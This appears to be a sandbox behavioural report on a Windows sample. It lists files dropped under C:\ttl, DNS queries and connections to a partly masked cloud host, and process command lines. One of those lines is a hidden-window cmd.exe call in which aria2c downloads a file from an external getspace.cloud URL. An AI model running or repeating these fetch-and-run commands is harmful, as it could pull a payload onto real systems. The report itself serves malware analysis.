Technical Information
- <SYSTEM32>\cmd.exe
- C:\ttl\tt
- C:\ttl\aria2c.exe
- C:\ttl\lzsr.exe
- C:\ttl\ttl_v6.exe
- %WINDIR%\temp\caba8dc.tmp
- %WINDIR%\temp\tara8ec.tmp
- C:\ttl\602.wcs.aria2__temp
- C:\ttl\602.wcs
- C:\ttl\data.bin
- %WINDIR%\temp\caba8dc.tmp
- %WINDIR%\temp\tara8ec.tmp
- C:\ttl\602.wcs.aria2
- C:\ttl\602.wcs
- C:\ttl\tt
- C:\ttl\lzsr.exe
- from C:\ttl\602.wcs.aria2__temp to C:\ttl\602.wcs.aria2
- 'ge###ace.cloud':443
- 'r3.#.lencr.org':80
- 'microsoft.com':80
- 'ge###ace.cloud':443
- DNS ASK ge###ace.cloud
- DNS ASK r3.#.lencr.org
- DNS ASK microsoft.com
- 'C:\ttl\lzsr.exe' d TT TTL_v6.EXE
- 'C:\ttl\ttl_v6.exe'
- 'C:\ttl\aria2c.exe' -c "https://getspace.cloud/cloud/s/bYkyBZW7bmg6FW9/download?path=/&files=602.wcs"
- 'C:\ttl\lzsr.exe' d TT TTL_v6.EXE' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c mode con lines=4 cols=60 & color e & C:\TTL\aria2c.exe -c "https://getspace.cloud/cloud/s/bYkyBZW7bmg6FW9/download?path=/&files=602.wcs"' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c mode con lines=4 cols=60 & color e & C:\TTL\aria2c.exe -c "https://getspace.cloud/cloud/s/bYkyBZW7bmg6FW9/download?path=/&files=602.wcs"
- '<SYSTEM32>\mode.com' con lines=4 cols=60